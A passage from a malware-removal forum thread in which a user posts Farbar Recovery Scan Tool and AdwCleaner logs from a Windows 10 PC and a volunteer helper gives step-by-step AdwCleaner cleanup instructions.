FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-02-18] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVG Antivirus; C:\Program Files (x86)\AVG\Antivirus\AVGSvc.exe [262696 2017-04-12] (AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files (x86)\AVG\Antivirus\x64\aswidsagenta.exe [7448992 2017-04-12] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1428680 2017-03-23] (AVG Technologies CZ, s.r.o.)
S3 cplspcon; C:\Windows\system32\IntelCpHDCPSvc.exe [480224 2016-11-01] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [341984 2016-11-01] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [654408 2012-04-04] (Malwarebytes Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 SNARE; C:\Users\palaboy\AppData\Local\SNARE\Snare.dll [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 avgbdisk; C:\Windows\system32\drivers\avgbdiska.sys [166136 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\Windows\system32\drivers\avgbidsdrivera.sys [310056 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\Windows\system32\drivers\avgbidsha.sys [192096 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgblog; C:\Windows\system32\drivers\avgbloga.sys [336408 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\Windows\system32\drivers\avgbuniva.sys [50848 2017-04-12] (AVG Technologies CZ, s.r.o.)
S3 avgHwid; C:\Windows\system32\drivers\avgHwid.sys [39288 2017-04-12] (AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\Windows\system32\drivers\avgMonFlt.sys [129776 2017-04-28] (AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\Windows\system32\drivers\avgRdr2.sys [102136 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\Windows\system32\drivers\avgRvrt.sys [76688 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\Windows\system32\drivers\avgSnx.sys [1006040 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\Windows\system32\drivers\avgSP.sys [557912 2017-04-28] (AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\Windows\system32\drivers\avgStm.sys [165048 2017-04-12] (AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\Windows\system32\drivers\avgVmm.sys [340688 2017-04-12] (AVG Technologies CZ, s.r.o.)
R1 epp; C:\EEK\bin64\epp.sys [124552 2016-11-23] (Emsisoft Ltd)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-21] (REALiX™)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [24904 2012-04-04] (Malwarebytes Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2016-04-21] (The OpenVPN Project)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [28272 2017-04-28] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-29 01:45 - 2017-04-29 01:45 - 00000400 _____ C:\Users\palaboy\Desktop\Scan_170429-014525.txt
2017-04-29 01:45 - 2017-04-29 01:45 - 00000400 _____ C:\Users\palaboy\Desktop\Scan_170429-014434.txt
2017-04-29 01:38 - 2017-04-29 01:38 - 00001078 _____ C:\Users\palaboy\Desktop\start emergency kit scanner - Shortcut.lnk
2017-04-29 01:37 - 2017-04-29 01:45 - 00000000 ____D C:\EEK
2017-04-29 01:37 - 2017-04-29 01:36 - 295932560 _____ C:\Users\palaboy\Desktop\EmsisoftEmergencyKit.exe
2017-04-29 00:46 - 2017-04-29 00:46 - 00000000 ____D C:\Users\palaboy\AppData\Local\Macromedia
2017-04-29 00:06 - 2017-04-29 00:06 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-29 00:05 - 2017-04-29 00:05 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-29 00:05 - 2017-04-29 00:05 - 00000000 ____D C:\Users\palaboy\Desktop\mbar-1.09.3.1001
2017-04-28 23:48 - 2017-04-28 23:48 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Sun
2017-04-28 23:45 - 2017-04-29 00:26 - 00000000 ____D C:\Users\palaboy\AppData\LocalLow\Mozilla
2017-04-28 23:43 - 2017-04-28 23:43 - 00000000 ____D C:\Users\palaboy\AppData\Local\ActiveSync
2017-04-28 23:42 - 2017-04-28 23:42 - 00000000 ____D C:\Users\palaboy\AppData\Local\CEF
2017-04-28 23:41 - 2017-04-28 23:41 - 00000000 ____D C:\Windows\AppReadiness
2017-04-28 23:30 - 2017-04-28 23:30 - 00004042 _____ C:\Windows\System32\Tasks\Samsung Update
2017-04-28 23:26 - 2017-04-28 23:26 - 00000000 ____D C:\Alitkojck
2017-04-28 23:24 - 2017-04-29 01:46 - 00000000 ____D C:\FRST
2017-04-28 23:21 - 2017-04-28 23:21 - 00188296 _____ C:\Users\palaboy\Desktop\ReportRogue.txt
2017-04-28 22:57 - 2017-04-28 23:50 - 00028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2017-04-28 22:56 - 2017-04-28 22:56 - 00000899 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-04-28 22:56 - 2017-04-28 22:56 - 00000000 ____D C:\Program Files\RogueKiller
2017-04-28 22:45 - 2017-04-28 22:46 - 00004606 _____ C:\Users\palaboy\Desktop\Rkill.txt
2017-04-28 22:19 - 2017-04-28 22:19 - 00000000 ___HD C:\$AV_AVG
2017-04-28 20:16 - 2017-04-28 20:16 - 00000000 ____D C:\Users\palaboy\Desktop\Old Firefox Data
2017-04-28 20:15 - 2017-04-28 20:15 - 00001216 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-28 20:15 - 2017-04-28 20:15 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-28 20:03 - 2017-04-28 20:14 - 00246056 _____ (Mozilla) C:\Users\palaboy\Downloads\Firefox Setup Stub 53.0.exe
2017-04-28 19:58 - 2017-04-28 19:58 - 00000000 ____D C:\Users\palaboy\Downloads\Internet Download Manager IDM 6.28 Build 8 Crack Only
2017-04-28 19:57 - 2017-04-28 19:57 - 01724745 _____ C:\Users\palaboy\Downloads\Internet Download Manager IDM 6.28 Build 8 Crack Only.zip
2017-04-28 19:53 - 2017-04-28 19:53 - 00000000 ____D C:\Users\palaboy\Downloads\IDM_6.28_Build_8_Crack_Free_Download_Silent_No_Patch_SadeemPC
2017-04-28 19:39 - 2017-04-29 00:49 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\IDM
2017-04-28 19:39 - 2017-04-28 19:39 - 00001078 _____ C:\Users\palaboy\Desktop\Internet Download Manager.lnk
2017-04-28 19:39 - 2017-04-28 19:39 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2017-04-28 19:39 - 2017-04-28 19:39 - 00000000 ____D C:\Program Files (x86)\Internet Download Manager
2017-04-28 19:38 - 2017-04-28 19:38 - 07163016 _____ (Tonec Inc.) C:\Users\palaboy\Downloads\idman628build8.exe
2017-04-28 19:27 - 2017-04-28 19:27 - 00000000 ____D C:\Program Files\PC Robotics
2017-04-28 14:21 - 2017-04-28 14:29 - 00000803 _____ C:\Users\palaboy\Desktop\Bills to Pay.txt
2017-04-27 23:33 - 2016-10-17 23:35 - 00223464 _____ (Tonec Inc.) C:\Windows\system32\Drivers\idmwfp.sys
2017-04-27 18:34 - 2017-04-27 18:34 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-27 02:02 - 2017-04-27 02:02 - 00048944 ____N (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-14 22:26 - 2017-04-27 19:25 - 00089837 ____H C:\Users\palaboy\AppData\Local\IconCache.db.backup
2017-04-14 18:12 - 2017-04-14 18:12 - 00001241 _____ C:\Users\palaboy\Desktop\Facebook Gameroom.lnk
2017-04-14 18:12 - 2017-04-14 18:12 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2017-04-14 18:12 - 2017-04-14 18:12 - 00000000 ____D C:\Users\palaboy\AppData\Local\Facebook
2017-04-14 18:06 - 2017-04-14 18:10 - 00252088 _____ (Facebook) C:\Users\palaboy\Downloads\FacebookGameroom.exe
2017-04-14 17:04 - 2017-04-14 17:15 - 00000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2017-04-14 17:04 - 2017-04-14 17:14 - 00223254 _____ C:\Windows\ntbtlog.txt
2017-04-14 17:00 - 2017-04-14 17:00 - 00000000 ___RD C:\Users\palaboy\Desktop\mbam-setup-1.61.0.1400 with Crack[Adios]
2017-04-14 16:56 - 2017-04-14 16:56 - 00001178 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2017-04-14 16:56 - 2017-04-14 16:56 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Malwarebytes
2017-04-14 16:56 - 2017-04-14 16:56 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2017-04-14 16:56 - 2012-04-04 15:56 - 00024904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2017-04-14 16:53 - 2017-04-28 23:41 - 00000000 ___RD C:\Users\palaboy\Dropbox
2017-04-14 16:42 - 2017-04-14 16:43 - 00690080 _____ (Dropbox, Inc.) C:\Users\palaboy\Downloads\DropboxInstaller.exe
2017-04-12 06:04 - 2017-04-12 06:04 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\AVG
2017-04-12 06:01 - 2017-04-12 06:01 - 00004008 _____ C:\Windows\System32\Tasks\Antivirus Emergency Update
2017-04-12 06:00 - 2017-04-28 19:25 - 00557912 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgsp.sys
2017-04-12 06:00 - 2017-04-28 19:25 - 00129776 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgmonflt.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00340688 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgVmm.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00165048 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgStm.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00102136 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgRdr2.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00076688 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgRvrt.sys
2017-04-12 06:00 - 2017-04-12 05:58 - 00039288 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgHwid.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 01006040 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgSnx.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 00336408 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbloga.sys
2017-04-12 06:00 - 2017-04-12 05:56 - 00050848 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbuniva.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00310056 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbidsdrivera.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00192096 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbidsha.sys
2017-04-12 06:00 - 2017-04-12 05:55 - 00166136 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgbdiska.sys
2017-04-12 05:59 - 2017-04-12 05:58 - 00400928 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\avgBoot.exe
2017-04-12 05:51 - 2017-04-27 15:30 - 00000955 _____ C:\Users\Public\Desktop\AVG.lnk
2017-04-12 05:48 - 2017-04-28 15:39 - 00003668 _____ C:\Windows\System32\Tasks\AVG EUpdate Task
2017-04-12 05:48 - 2017-04-12 05:51 - 00000000 ____D C:\Program Files (x86)\AVG
2017-04-12 05:47 - 2017-04-12 05:47 - 00000552 _____ C:\Users\palaboy\AppData\Local\TroubleshooterConfig.json
2017-04-12 05:40 - 2017-04-12 05:51 - 00000000 ____D C:\Users\palaboy\AppData\Local\AvgSetupLog
2017-04-12 05:40 - 2017-04-12 05:40 - 00000000 ____D C:\Users\palaboy\AppData\Local\Avg
2017-04-12 04:33 - 2017-04-12 04:33 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\Windows\system32\Drivers\PROCEXP152.SYS
2017-04-12 04:32 - 2017-04-29 00:01 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-12 04:32 - 2017-04-28 22:19 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-12 04:32 - 2017-04-12 04:32 - 00000000 ____D C:\Windows\SysWOW64\{F5461AD9-4035-4FB3-899A-A3498960C91E}
2017-04-12 03:58 - 2017-04-12 03:58 - 00000000 ____D C:\Users\palaboy\.android
2017-04-12 03:57 - 2017-04-12 05:06 - 00000000 ____D C:\Users\palaboy\.VirtualBox
2017-04-12 03:50 - 2017-04-12 03:57 - 00000000 _____ C:\hsrv.txt
2017-04-12 03:49 - 2017-04-12 03:49 - 20316248 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2017-04-05 21:14 - 2017-04-05 21:15 - 00000000 ____D C:\Users\TEMP
2017-04-05 21:14 - 2017-04-05 21:14 - 00000000 ____D C:\Users\TEMP\AppData\Local\TileDataLayer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-29 01:04 - 2016-02-27 03:33 - 00004170 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{FD1EFA04-C794-40DD-8A02-DC4E00D1A2AD}
2017-04-29 00:32 - 2016-02-27 02:07 - 00879220 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-29 00:32 - 2015-10-30 15:21 - 00000000 ____D C:\Windows\INF
2017-04-29 00:26 - 2016-02-27 02:27 - 00000000 __SHD C:\Users\palaboy\IntelGraphicsProfiles
2017-04-29 00:25 - 2016-02-27 02:01 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-29 00:24 - 2016-02-27 03:34 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\DMCache
2017-04-29 00:24 - 2015-10-30 17:14 - 00000000 ____D C:\Windows\ServiceProfiles
2017-04-29 00:24 - 2015-10-30 14:28 - 00524288 ___SH C:\Windows\system32\config\BBI
2017-04-29 00:05 - 2016-02-27 03:34 - 00000000 ____D C:\Users\palaboy\Downloads\Compressed
2017-04-29 00:00 - 2016-03-25 18:43 - 00000008 __RSH C:\Users\palaboy\ntuser.pol
2017-04-29 00:00 - 2016-02-27 02:11 - 00000000 ____D C:\Users\palaboy
2017-04-28 23:57 - 2016-10-15 05:41 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-28 23:57 - 2015-10-30 15:24 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-28 23:49 - 2016-03-04 14:03 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-28 23:48 - 2016-03-04 14:03 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-28 23:45 - 2016-03-04 11:21 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Mozilla
2017-04-28 23:41 - 2016-03-04 11:21 - 00000000 ____D C:\Users\palaboy\AppData\Local\Mozilla
2017-04-28 23:41 - 2016-02-27 02:26 - 00000000 ____D C:\Intel
2017-04-28 23:41 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\appcompat
2017-04-28 23:40 - 2017-03-25 02:08 - 00000000 ___HD C:\$WINDOWS.~BT
2017-04-28 23:30 - 2016-08-15 00:44 - 00000000 ____D C:\Users\palaboy\AppData\Local\CrashDumps
2017-04-28 20:23 - 2015-10-30 15:11 - 00000000 ____D C:\Windows\CbsTemp
2017-04-28 15:52 - 2016-02-27 17:58 - 00000000 ____D C:\Windows\Panther
2017-04-28 12:42 - 2015-10-30 15:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-04-27 19:36 - 2016-07-08 17:37 - 00000000 ____D C:\Users\palaboy\AppData\Local\Citrix
2017-04-27 19:29 - 2015-10-30 15:24 - 00000000 __RHD C:\Users\Public\Libraries
2017-04-27 19:26 - 2016-08-02 03:34 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Audacity
2017-04-27 19:26 - 2016-03-04 11:23 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Skype
2017-04-27 19:26 - 2016-03-04 11:03 - 00000000 ____D C:\Users\palaboy\AppData\LocalLow\Adobe
2017-04-27 19:26 - 2016-02-29 10:28 - 00000000 ___HD C:\Program Files (x86)\Temp
2017-04-27 19:26 - 2016-02-27 03:16 - 00000000 ____D C:\Users\palaboy\AppData\Local\Big Fish
2017-04-27 19:26 - 2016-02-27 02:31 - 00000000 ____D C:\Users\palaboy\AppData\Local\Comms
2017-04-27 19:26 - 2016-02-27 02:22 - 00000000 ____D C:\Users\palaboy\AppData\Local\MicrosoftEdge
2017-04-27 19:26 - 2016-02-27 02:12 - 00000000 ____D C:\Users\palaboy\AppData\Roaming\Adobe
2017-04-27 19:26 - 2016-02-27 02:12 - 00000000 ____D C:\Users\palaboy\AppData\Local\VirtualStore
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 __RSD C:\Windows\Media
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___SD C:\Windows\SysWOW64\DiagSvcs
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___SD C:\Windows\SysWOW64\Configuration
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\setup
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\MUI
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\SysWOW64\Com
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\security
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\Registration
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\InputMethod
2017-04-27 19:26 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\Help
2017-04-27 19:25 - 2015-10-30 15:24 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-04-21 12:44 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\system32\NDF
2017-04-14 19:20 - 2016-02-27 09:02 - 00000000 ____D C:\Windows\system32\MRT
2017-04-14 19:18 - 2016-02-27 09:02 - 148601744 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-04-14 19:15 - 2015-10-30 15:24 - 00000167 _____ C:\Windows\win.ini
2017-04-14 17:09 - 2017-01-21 19:11 - 00000000 ___HD C:\Users\palaboy\AppData\Roaming\com
2017-04-12 03:49 - 2016-08-09 21:17 - 00004386 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-04-12 03:49 - 2015-10-30 15:24 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-08 06:06 - 2016-02-27 08:50 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-05 21:22 - 2016-02-27 10:48 - 00000000 ____D C:\Users\palaboy\AppData\Local\ElevatedDiagnostics
2017-04-05 21:14 - 2016-02-27 02:12 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-04-02 03:05 - 2015-10-30 15:26 - 00835576 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-02 03:05 - 2015-10-30 15:26 - 00177656 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-01 02:40 - 2016-03-04 10:55 - 00000000 ____D C:\Users\palaboy\AppData\Local\Adobe

==================== Files in the root of some directories =======

2016-08-23 17:27 - 2016-08-23 18:56 - 0000600 _____ () C:\Users\palaboy\AppData\Local\PUTTY.RND
2017-04-12 05:47 - 2017-04-12 05:47 - 0000552 _____ () C:\Users\palaboy\AppData\Local\TroubleshooterConfig.json
2016-02-29 10:28 - 2016-02-29 10:28 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-27 16:49

==================== End of FRST.txt ============================

 

 

Is the computer showing any signs of malware now? --> So far, everything looks good. Are there any more steps that I need to do?

 

Please let me know. Many thanks!



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:09:01 PM

Posted 01 May 2017 - 07:25 AM

One more check for any leftovers.
 
Please download AdwCleaner by Xplode and save to your Desktop.
  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • The tool will start to update its database...please wait until complete.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button...a report (AdwCleaner[SX].txt) will open in Notepad (where the largest value of X represents the most recent report).
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#9 palaboyako

palaboyako
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  
  • Local time:10:01 AM

Posted 03 May 2017 - 03:27 AM

Hello,

 

Here it is: AdwCleaner[C2].txt

 

# AdwCleaner v6.046 - Logfile created 03/05/2017 at 16:22:35
# Updated on 24/04/2017 by Malwarebytes
# Database : 2017-05-02.1 [Server]
# Operating System : Windows 10 Pro  (X64)
# Username : palaboy - WIN10
# Running from : C:\Users\palaboy\Desktop\adwcleaner_6.046.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: SNARE


***** [ Folders ] *****

[-] Folder deleted: C:\Program Files\PC Robotics
[-] Folder deleted: C:\Users\palaboy\AppData\Local\app


***** [ Files ] *****

[-] File deleted: C:\Windows\SysNative\drivers\TAOKernelEx64.sys
[-] File deleted: C:\TOSTACK
[-] File deleted: C:\Windows\rsrcs.dll
[-] File deleted: C:\Users\Public\Documents\temp.dat
[-] File deleted: C:\Users\Public\Documents\report.dat


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****

[-] Shortcut disinfected: C:\Users\palaboy\Desktop\Tor Browser\Start Tor Browser.lnk
[-] Shortcut disinfected: C:\Users\palaboy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk


***** [ Scheduled Tasks ] *****

[-] Task deleted: Samsung Update


***** [ Registry ] *****

[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SNARE
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7F46C358-270D-4791-A579-AD1DDA1A3F7B}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E4ADC61E-D06A-4E0E-8582-78C809CC8450}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{EB2BEAEF-150C-4DE4-9D09-F16403C22769}
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKU\.DEFAULT\Software\UpgSvr
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\Installer
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\AutoTime
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\dlr
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\PopWnd
[-] Key deleted: HKU\S-1-5-21-3175129382-567401783-3479919610-1001\Software\UpgSvr
[#] Key deleted on reboot: HKU\S-1-5-18\Software\UpgSvr
[#] Key deleted on reboot: HKCU\Software\Installer
[#] Key deleted on reboot: HKCU\Software\AutoTime
[#] Key deleted on reboot: HKCU\Software\dlr
[#] Key deleted on reboot: HKCU\Software\PopWnd
[#] Key deleted on reboot: HKCU\Software\UpgSvr
[-] Key deleted: HKLM\SOFTWARE\ScreenShot
[#] Key deleted on reboot: [x64] HKCU\Software\Installer
[#] Key deleted on reboot: [x64] HKCU\Software\AutoTime
[#] Key deleted on reboot: [x64] HKCU\Software\dlr
[#] Key deleted on reboot: [x64] HKCU\Software\PopWnd
[#] Key deleted on reboot: [x64] HKCU\Software\UpgSvr
[-] Key deleted: [x64] HKLM\SOFTWARE\InterSect Alliance
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\3DCCCD6BD02558446B24CF1C63EC213C
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\3DCCCD6BD02558446B24CF1C63EC213C
[-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
[-] Key deleted: HKEY_CLASSES_ROOT\.qmgc
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [Kitty]


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [6557 Bytes] - [19/04/2016 02:59:31]
